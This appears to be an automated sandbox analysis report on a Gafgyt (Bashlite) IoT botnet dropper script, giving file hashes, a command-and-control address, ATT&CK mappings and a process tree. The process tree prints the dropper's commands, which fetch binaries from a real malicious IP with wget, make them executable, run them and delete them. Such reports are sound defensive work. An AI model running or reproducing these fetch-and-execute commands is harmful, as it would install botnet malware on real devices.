gafgyt | 1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b

Analysis

max time kernel
15s
max time network
17s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-12-2024 02:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b.sh
Size

2KB
MD5

38530bb2fc22c035260c8a4fb33ee8ba
SHA1

a442c5ef953468e28f7da8d1bae9428f571dc587
SHA256

1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b
SHA512

b7d21f550985a44d48484f62b010ecb22d5a0474b56470f0c4cc323ea6ac7023cda4486fc5ade21392ed7841f8f520e9c11a903897e4f494b796b5b579e27dc7

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

154.213.186.115:4444

Signatures

Detected Gafgyt variant 2 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
752	chmod
758	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/jackmymips	753	jackmymips
/tmp/jackmymips64	759	jackmymips64

System Network Configuration Discovery 1 TTPs 7 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
650	wget
753	jackmymips
756	rm
757	wget
759	jackmymips64
761	rm
762	wget

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jackmymips	wget
File opened for modification	/tmp/jackmymips64	wget

/tmp/1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b.sh
/tmp/1b099d704be7ad0232861396b44a8e0bf2578f6a57294a213ed727f28bc52f3b.sh
1⤵
PID:647
- /usr/bin/wget
  wget http://154.213.186.115/jackmymips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:650
- /bin/chmod
  chmod +x jackmymips
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/jackmymips
  ./jackmymips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:753
- /bin/rm
  rm -rf jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:756
- /usr/bin/wget
  wget http://154.213.186.115/jackmymips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:757
- /bin/chmod
  chmod +x jackmymips64
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/jackmymips64
  ./jackmymips64
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:759
- /bin/rm
  rm -rf jackmymips64
  2⤵
  - System Network Configuration Discovery
  PID:761
- /usr/bin/wget
  wget http://154.213.186.115/jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:762

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jackmymips

Filesize
199KB

MD5
f2ab2725ea6c883a5c608bc365c41fe5

SHA1
454d6983d9a7bb59aa0441b2c2cc805a97738e66

SHA256
531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d

SHA512
572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

Download Submit
/tmp/jackmymips64

Filesize
244KB

MD5
89655c0a64c3552ee71dc901a3561ad1

SHA1
8a488927882c18b5a35da06c6428f8707d4314ad

SHA256
08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04

SHA512
23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

Download Submit